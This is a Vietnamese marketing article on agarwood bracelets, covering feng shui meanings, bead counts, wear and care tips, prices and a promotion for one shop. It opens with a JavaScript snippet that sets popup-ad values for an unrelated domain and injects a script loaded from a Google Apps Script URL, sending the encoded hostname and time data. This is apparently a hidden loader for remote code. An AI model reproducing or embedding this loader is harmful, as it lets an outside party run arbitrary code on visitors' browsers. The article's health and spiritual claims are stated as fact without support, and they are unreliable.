var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Gợi ý đeo vòng trầm hương có tác dụng gì hot nhất hiện nay 2023

Vòng trầm hương là 1 trong những sản phẩm phổ biến nhất được làm từ trầm hương. Để vòng trầm hương phát huy những hiệu quả tối ưu cần biết 13 lưu ý khi sử dụng . Hãy cùng Hành Trình Trầm Hương tìm hiểu những thông tin thú vị về vòng tay trầm hương, tác dụng của vòng trầm hương cũng như tham khảo các lưu ý khi đeo vòng trầm hương để mang lại nhiều hiệu quả may mắn trong bài viết sau nhé.

I. Bạn biết gì về vòng tay trầm hương?

Hiện nay trên thị trường có bán đa dạng các sản phẩm vòng trầm hương đeo tay với đa dạng mẫu mã, kiểu dáng đẹp mắt từ vòng trầm tự nhiên, vòng trầm cao cấp cho đến vòng trầm thường. Các sản phẩm này đều được làm từ gỗ Trầm hương nguyên chất nên mang đến rất nhiều công dụng tuyệt vời khi sử dụng.

Vòng tay trầm hương có các mức giá cũng khác nhau tùy thuộc vào loại gỗ trầm, tuổi trầm và lượng tinh dầu chứa trong sản phẩm. Người dùng có thể sử dụng vòng trầm như một món trang sức làm đẹp và có ý nghĩa tuyệt vời trong phong thủy.

Nếu bạn đang quan tâm đến những tác dụng tuyệt vời của vật phẩm này, hãy cùng Hành Trình Trầm hương khám phá 13 lưu ý khi đeo vòng trầm ở phần dưới đây để rõ hơn nhé!

Vong trầm hương mang rất nhiều ý nghĩa
Vòng trầm hương mang rất nhiều ý nghĩa khác nhau

>>Tham khảo ngay các mẫu Vòng trầm hương Thiên Mộc Hương tài lộc HOT nhất 2023

II. Đeo vòng trầm hương để làm gì? Có tốt không?

Hiện nay, vòng tay trầm hương đã trở thành một món trang sức thời thượng phù hợp dành cho cả nam và nữ. Chiếc vòng trầm này thích hợp với mọi độ tuổi từ trẻ em cho đến người lớn. Bạn có thể mang nó đi làm, đi chơi hoặc tham gia các bữa tiệc mà vẫn thật phong cách.

Đằng sau vẻ đẹp thẩm mỹ, vòng trầm hương còn sở hữu những giá trị tốt đẹp. Trầm hương có tính ấm và vị cay, khi mang nó trên người, nó sẽ giúp lưu thông khí huyết, làm cơ thể bạn trở nên khỏe mạnh và tràn đầy năng lượng. Mùi hương nhẹ nhàng nhưng sâu lắng của Trầm hương làm dịu êm tâm trí, giảm căng thẳng và mệt mỏi. Thực sự, Trầm hương đã được coi như một liệu pháp hữu hiệu để chống lại căng thẳng và stress.

Đeo vòng trầm hương
Đeo vòng trầm hương để làm gì?

Tuy nhiên, giá trị quan trọng nhất và đáng chú ý nhất là tính phong thủy của Trầm hương. Năng lượng này có khả năng kích hoạt và lan truyền từ những nơi cao đến những nơi thấp.

Chính vì vậy, việc đeo Vòng Trầm hương sẽ giúp cơ thể bạn tiếp nhận được nguồn năng lượng tích cực, từ đó cũng giúp sự nghiệp và công việc của bạn sẽ gặp nhiều may mắn và thuận lợi hơn. Ngoài ra, Trầm hương còn được nhiều người tin rằng có khả năng xua đuổi tà ma và đẩy lùi các yếu tố tiêu cực khi mang nó theo bên mình.

III. 13 lưu ý khi đeo vòng trầm hương

Để việc đeo vòng trầm phát huy tối đa công dụng, bạn cần tuân thủ đúng những lưu ý khi đeo vòng trầm hương đặc biệt mà chúng tôi đã tổng hợp được từ những chuyên gia đầu ngành về trầm như sau:

1. Chọn vòng trầm hương phù hợp

Để có thể chọn vòng trầm hương phù hợp thì chúng ta có thể dựa vào ý nghĩa số hạt trầm hương hoặc là dựa vào mệnh của mình. Một số ý nghĩa tiêu biểu về số hạt của các loại vòng phổ biến như: vòng 108 hạt Trầm Hương đặc biệt phù hợp cho những người thiền định và cầu an, hay đi chùa, vòng 54 hạt có thể quấn hai vòng trên tay và được phối rất nhiều charm, còn vòng 17 hạt là kiểu vòng đơn, nhẹ nhàng, giản dị.

Ngoài ra, vì vòng tay trầm hương là 1 vật phẩm phong thuỷ nên người đeo cần chọn vòng dựa vào cung mệnh của riêng mình.

>> Tìm hiểu thêm trong bài viết: Vòng tay trầm hương hợp tuổi nào, mệnh gì? 5 cách chọn vòng tay chuẩn xác

Mỗi số hạt vòng sẽ có những ý nghĩa riêng
Số hạt vòng mang rất nhiều ý nghĩa khác nhau

2. Nên đeo vòng trầm tay trái khi nào?

Đeo vòng trầm hương tay trái thích hợp khi bạn đến dự hoặc tham gia những cuộc họp, hoạt động kinh doanh, buổi lễ,… Nhìn chung là những địa điểm mà không có âm khí nhiều hay khí vận không tốt hiện hữu. Cụ thể bạn cần lưu ý khi đeo vòng trầm hương như sau:

 • Vào những cuộc họp quan trọng và mong muốn có thể đạt được những mục tiêu quan trọng trong công việc: cuộc họp ký kết hợp đồng,…
 • Vào những buổi lễ mang tính hòa bình và hạnh phúc, thành công: tiệc sinh nhật, lễ khai mạc, khởi công
 • Khi đi tham gia vào những buổi lễ cầu an ở chùa.
 • Khi đến thăm những người lớn tuổi, là tiền bối, cấp trên của bạn. Đây là những người có ảnh hưởng đến cuộc sống, công việc của bạn.
Đeo vòng trầm hương
Đeo vòng trầm hương tay trái mang nhiều ý nghĩa

2. Nên đeo vòng tay trầm hương bên tay phải khi nào?

 • Đeo bên phía tay phải có chức năng giúp trừ tà, xua đuổi những vận khí không tốt, phòng tránh tai họa cho bản thân:
 • Khi bạn đi đến những nơi có nhiều âm khí như là đi thăm mộ, đi vào bệnh viện cũ hoặc đi đêm trong những nơi rừng sâu…
 • Khi bạn đi đến những nơi có liên quan đến chết chóc: hiện trường tai nạn, bệnh viện,…
 • Khi bạn đến những nơi đông, hỗn tạp như khu vui chơi.
Đeo vòng trầm hương tay phải có thể giúp chống lại tà khí
Đeo vòng trầm hương tay phải có thể giúp chống lại tà khí

4. Đeo vòng trầm hương bao nhiêu hạt thì tốt?

Về số hạt trên vòng trầm hương, các chuyên gia phong thủy khuyên rằng tổng số hạt vòng không nên chia hết cho 4, mà tốt nhất là chia 4 dư 1. Bởi chia hết cho 4 sẽ là “Tử” – không tốt; trong khi chia hết cho 4 mà dư 1 sẽ trở thành từ “Tử” (4) quay về “Sinh” (1).

Chính vì lý do này nên mới có các loại vòng 17 hạt, 54 hạt, 108 hạt, … Hãy chọn lựa số hạt sao cho đúng phong thủy lại vừa vặn với cổ tay của bạn. Đây chính là lưu ý khi đeo vòng trầm hương bạn không nên bỏ qua.

Vòng trầm hương có số hạt khác nhau sẽ mang ý nghĩa khác nhau
Vòng trầm có số hạt khác nhau sẽ mang ý nghĩa khác nhau

5. Nên chọn kích thước vòng trầm hương phù hợp

Thực tế, không có quy định nhiều về kích thước của vòng trầm hương. Tuy nhiên, để tạo điểm nhấn thẩm mỹ và thể hiện sự tinh tế của bản thân, bạn nên chọn mua vòng trầm có kích thước hạt phù hợp với cổ tay.

Hiện nay, có sự đa dạng về kích thước hạt trầm hương như 6mm, 8mm, 10mm, 12mm,… Nếu bạn có cổ tay nhỏ, hãy lựa chọn vòng trầm với kích thước hạt nhỏ hơn. Ngược lại, nếu cổ tay bạn lớn hơn, hạt trầm lớn hơn sẽ phù hợp hơn. Việc lựa chọn kích thước đúng sẽ giúp tay bạn trông thon gọn và hài hòa hơn khi đeo vòng trầm hương.

6. Cách bảo quản chuỗi vòng trầm hương tự nhiên đúng chuẩn

Để bảo quản chuỗi vòng trầm hương của bạn luôn giữ được sự đẹp và tươi mới như ban đầu mới mua về, hãy tuân thủ các nguyên tắc bảo quản sau đây:

 • Hạn chế để vòng tiếp xúc với nước, nước hoa, mỹ phẩm, chất tẩy rửa và các chất có thể gây hại cho trầm hương.
 • Khi tắm hoặc rửa tay, hãy tháo chuỗi vòng trầm và đặt sản phẩm trong một nơi khô ráo để bảo vệ hương thơm trầm hương lâu hơn.
 • Lau chùi từng hạt trầm bằng một khăn mềm thường xuyên để giữ cho hương thơm trầm hương lan tỏa và luôn giữ sạch sẽ.
 • Tránh để chuỗi vòng trầm của bạn va chạm với các vật cứng, đồ sắt nhọn hoặc các vật có thể gây trầy xước hoặc làm hỏng.
 • Khi gặp sự cố, hãy mang chuỗi vòng trầm hương đến cửa hàng uy tín Thiên Mộc Hương để được xử lý đúng cách. Ví dụ, khi bị ngâm nước quá lâu hoặc tiếp xúc với mồ hôi nhiều, vòng trầm hương có thể mất mùi hoặc bị ảnh hưởng.

Tuân thủ những lưu ý khi đeo vòng trầm hương này đảm bảo sẽ giúp bạn duy trì sự đẹp và chất lượng của chuỗi vòng trầm hương trong thời gian dài.

kích thước của vòng trầm đeo tay
Kích thước sẽ phụ thuộc vào nhiều yếu tố

7. Bà bầu đeo trầm hương có tốt không?

Dựa trên những lợi ích mang lại, Trầm Hương được đánh giá là đem đến nhiều công dụng tuyệt vời cho sức khỏe. Tuy nhiên, trong trường hợp của những phụ nữ mang bầu, do cơ thể có thân nhiệt tăng cao và những biến đổi cảm xúc trong thai kỳ, do đó rất dễ dẫn đến ảnh hưởng bởi các yếu tố bên ngoài. Mặc dù Trầm Hương có lợi nhưng có thể gây ra những tác hại không mong muốn đối với cơ thể của phụ nữ mang bầu.

Vậy nên với câu hỏi là “Bà bầu đeo trầm hương có tốt không” , chúng tôi xin giải đáp là bạn không nên đeo vòng trầm hương thường xuyên khi đang mang bầu. Trầm Hương có tính nóng, điều này sẽ không tốt cho sức khỏe của mẹ bầu. Trong quá trình mang thai, nhiệt độ cơ thể của phụ nữ thường cao hơn so với bình thường. Việc đeo vòng trầm hương quá thường xuyên có thể ảnh hưởng đến sức khỏe của mẹ bầu.

Bà bầu không nên đeo vòng trầm hương
Bà bầu không nên đeo vòng trầm hương

8. Không tiếp xúc với nước

Hạt trầm hương có tính chất nhẹ, mềm và hấp thụ chất lỏng nên chúng đòi hỏi sự chăm sóc tốt nhất để duy trì vẻ ngoài và mùi thơm của nó. Dính nước là một trong những điều kiêng kỵ khi đeo vòng trầm hương, nước sẽ làm hạt gỗ dễ bị nở ra và nứt.

Bảo quản vòng ở nơi khô ráo để trầm không bị mất mùi và biến chất. Như vậy mới giữ vòng tay trầm hương được lâu hơn và phát huy công dụng mạnh mẽ hơn.

Vòng trầm hương kị nước
Vòng trầm hương kị nước

9. Có nên đeo vòng trầm hương khi ngủ?

Đeo vòng trầm hương khi ngủ cũng sẽ mang đến rất nhiều lợi ích như an thần, giúp giấc ngủ ngon và sâu hơn. Ngoài ra sử dụng vòng trầm khi ngủ sẽ giúp bạn xua đuổi được tà khí ma quỷ, xua đuổi côn trùng gây hại….

Tuy nhiên nên tránh các trường hợp đeo khi quan hệ vợ chồng hoặc sợ bị cấn khi ngủ thì bạn cũng có thể tháo vòng ra cất đi.

Đeo vòng trầm khi ngủ mang đến rất nhiều tác dụng tốt cho sức khoẻ
Đeo vòng trầm khi ngủ mang đến rất nhiều tác dụng tốt cho sức khoẻ

10. Cách đeo vòng trầm giúp giảm căng thẳng, tăng sự tập trung

Khi bạn bị stress hay căng thẳng nên đặt chuỗi vòng vào lòng hai bàn tay và xoa nhẹ. Hương thơm từ vòng tay trầm hương sẽ trấn tĩnh đầu óc của bạn. Mùi hương trầm dịu nhẹ giúp người dùng thư giãn và tập trung hơn trong công việc.

Đeo vòng trầm giúp mang đến sự thư giản và tinh thần thoả mái
Đeo vòng trầm giúp mang đến sự thư giản và tinh thần thoả mái

11. Có thể đeo mấy vòng tay trầm hương cùng lúc?

Hoàn toàn có thể đeo 2 hoặc nhiều vòng trầm cũng một tay, bạn không cần quá lo lắng về vấn đề đó. Tất cả các vòng đều sẽ giúp người đeo cải thiện được vận may của mình. Nếu tốt hơn, bạn nên tuân theo quy tắc tính hạt sinh-lão-bệnh-tử để vòng phát huy tác dụng tốt hơn nhé.

Vòng trầm hương
Có thể đeo nhiều vòng cũng lúc

12. Trầm hương có gây kích ứng không?

Tuỳ cơ địa người đeo và chất liệu của trầm mà đeo vòng trầm hương vẫn có thể bị ứng. Tuy nhiên, xác suất đeo vòng trầm bị dị ứng khá là thấp, chỉ xảy ra ở một số ít người đeo. Khi bị kích ứng, bạn nên ngừng đeo vòng một thời gian nếu vẫn bị lại thì nên ngừng đeo. Đây là hiện tượng rất bình thường.

cách đeo vòng trầm hương
Những người không hợp khi đeo vòng có thể bị dị ứng

13. Vệ sinh trầm bằng vải khô mềm

Thỉnh thoảng bạn nên lau chùi và vệ sinh vòng trầm hương bằng vải khô mềm. Khi muốn đánh bóng hoặc vệ sinh vòng, hãy dùng vải cotton mềm. Tránh sử dụng các loại hoá chất tẩy rửa hay tác dụng quá mạnh.

Lau vòng bằng vải khô

IV. Đeo vòng trầm hương có tác dụng gì?

Đeo vòng trầm hương có tác dụng gì là thắc mắc của rất nhiều người hiện nay khi mới bắt đầu sử dụng vật phẩm này. Chứa nhiều ý nghĩa tuyệt vời, tác dụng của vòng trầm hương rất đặc biệt như sau:

1. Tác dụng của vòng trầm hương về thời trang

Đeo vòng trầm hương để làm gì? Vòng tay được chế tác từ trầm hương tự nhiên được xem là 1 loại trang sức quý giá. Đeo vòng trầm sẽ thể hiện được đẳng cấp sang trọng cho người đeo.

Để các sản phẩm vòng tay trầm hương đa dạng phụ hợp với nhiều đối tượng khách hàng nhất các nhãn hãng đã mix thêm các chi tiết đẹp và tinh tế. Chính vì vậy mà hiện nay vòng tay trầm hương rất được mọi người yêu thích.

Công dụng của vòng trầm hương
Vòng trầm hương trở thành món trang sức cao cấp

>>>Muốn tìm hiểu tác dụng của vòng trầm hương trước tiên ta phải nắm rõ các kiến thức về nguyên liệu cấu tạo nên chúng. Tìm hiểu ngay Trầm hương là gì? Đặc điểm, công dụng và phân biệt các loại trầm

2. Tác dụng vòng trầm hương về phong thuỷ

Năng lượng từ vòng tay trầm hương được cho là có thể mang đến may mắn và bình an cho người đeo. Tác dụng của vòng trầm hương được cho là có thể xua đuổi những điều không may mắn và đem đến sự thịnh vượng trong kinh doanh.

Vòng trầm hương dùng để làm gì
Tác dụng của vòng trầm hương có thể mang lại may mắn

3. Tác dụng của vòng trầm về sức khoẻ

Ngửi mùi hương toả ra từ vòng trầm hương sẽ mang lại tinh thần thư thái, người đeo sẽ có được giấc ngủ ngon và sự an tịnh trong tâm. Mùi hương của vòng trầm có thể giúp giải toả được căng thẳng và mệt mỏi.

Vòng trầm hương có tác dụng tích cực với sức khoẻ
Vòng trầm hương có tác dụng tích cực với sức khoẻ

>> Tìm hiểu thêm về tác dụng của trầm hương đối với con người rất đặc biệt

V. Bảng giá 1 số loại vòng trầm hương tự nhiên

Vòng trầm hương sẽ có các mức giá khác nhau tuỳ vào những yếu tố cấu tạo riêng như: Gỗ trầm, kích thuốc vòng, các chi tiết mix cùng,…Thông thường các mẫu vòng trầm hương sẽ có các mức giá dao động như sau: Giá vòng trầm hương tốc dao động từ 990.000 VNĐ – 2.000.000 VNĐ

Giá vòng trầm hương loại 1 dao động từ 3.000.000 VND – 20.000.000 VNĐ

Giá vòng trầm hương cao cấp vào khoảng 30.000.000 VNĐ – 800.000.000 VNĐ>> Tham khảo chi tiết : Giá vòng trầm hương là bao nhiêu?

VI. Một số mẫu vòng tay trầm hương phổ biến

1. Vòng tay trầm hương 108 hạt

Đây là một trong những mẫu vòng bán chạy nhất hiện nay. Với thiết kế đơn giản nhưng không kém phần sang trọng, vòng tay trầm hương 108 hạt luôn dành được sự ưu ái từ quý khách hàng.

Công dụng vòng trầm hương 108 hạt là mang đến ý nghĩa bình an; giúp chủ nhân cảm thấy nhẹ nhàng, thanh thản trong tâm hồn.

Vòng trầm hương 108 hạt
Vòng trầm hương 108 hạt

Tìm hiểu thêm: Vòng trầm hương 108 hạt có ý nghĩa gì? Top 5 vòng 108 đáng mua nhất

Nguồn: Vấn đáp Thầy Thích Pháp Hòa

2. Vòng tay trầm hương bọc vàng

“Giàu chơi vàng, sang chơi trầm”, hai vật phẩm tượng trưng cho sự giàu có và sang trọng giờ đây đã được kết hợp trong cùng một món trang sức cao cấp. Vòng trầm bọc vàng mang đến cho gia chủ vẻ ngoài đẳng cấp, thể hiện được địa vị của người đeo.

Ngoài ra, vòng trầm bọc vàng còn là vật phẩm may mắn thu hút tài lộc, giúp bạn sớm thành công trong sự nghiệp. Đồng thời, giá vòng tay trầm bọc vàng cũng cao hơn so với vòng bình thường.

Vòng trầm hương bọc vàng
Vòng trầm hương bọc vàng

Xem thêm: Top 12 mẫu vòng trầm hương bọc vàng giúp chủ nhân phát tài phát lộc

3. Vòng tay trầm hương tỳ hưu

Mẫu vòng tỳ hưu dành cho nam giới với kiểu dáng nam tính, thể hiện đẳng cấp cũng như sự thành công cho phái mạnh. Tỳ hưu là vật phẩm phong thủy đại diện cho việc thu hút tài lộc, giữ tiền của cho chủ nhân.

Bên cạnh đó, vòng trầm tỳ hưu giúp người đeo tạo được sự tin tưởng với người đối diện. Đặc biệt, chúng cực kỳ hữu dụng trong các công việc như tư vấn, gặp gỡ khách hàng, …

Vòng trầm hương
Vòng trầm hương tỳ hưu

4. Vòng tay trầm hương Tứ diệp bảo

Nếu bạn muốn gặp nhiều may mắn thì vòng trầm tứ diệp bảo chính là sự lựa chọn hàng đầu bạn nên cân nhắc. Cỏ 4 lá biểu tượng của vận may, thuận lợi.

Ngoài ra, công dụng vòng trầm Tứ diệp bảo giúp chủ nhân dễ dàng vượt qua những khó khăn, cám dỗ trong cuộc sống. Chính vì vậy mà mẫu vòng này ngày càng chiếm trọn cảm tình của đại đa số khách hàng khó tính. Với thiết kế đơn giản, tinh tế phù hợp dành cho cả nam và nữ.

Vòng trầm hương tứ diệp bảo

VII. Mua vòng tay trầm hương ở đâu uy tín nhất?

Vòng tay trầm hương là sản phẩm có giá trị cao, do đó bạn nên chọn mua tại những địa chỉ uy tín để đảm bảo chất lượng nhất. Và Thiên Mộc Hương chính là cái tên hàng đầu mà bạn không nên bỏ lỡ nếu có ý định mua vòng trầm nói riêng và các sản phẩm từ trầm hương nói chung.

Đến với Thiên Mộc Hương bạn sẽ có thể thoải mái lựa chọn giữa rất nhiều sản phẩm với giá thành từ thấp đến cao. Chúng tôi đảm bảo mọi sản phẩm đều được làm từ gỗ trầm hương nguyên chất 100%, hứa hẹn sẽ mang đến sự hài lòng tuyệt đối cho khách hàng. Đặc biệt, mọi dịch vụ của cửa hàng cũng được đánh giá cao, do đó bạn có thể yên tâm đặt niềm tin tuyệt đối.

>>> Xem ngay các mẫu vòng tay trầm nữ và vòng trầm hương nam cực đẹp, sang trọng và tinh tế đang được ưa chuộng nhất hiện nay!!!

VIII. Lời kết

Vòng trầm hương không chỉ là món trang sức độc đáo, nó còn mang ý nghĩa tâm linh sâu sắc mang đến may mắn và hạnh phúc cho người đeo. Với những lưu ý mà Hành Trình Trầm Hương chia sẻ, mong rằng bạn đã có thêm cho mình những thông tin hữu ích và chọn được chiếc vòng tay ưng ý nhất nhé.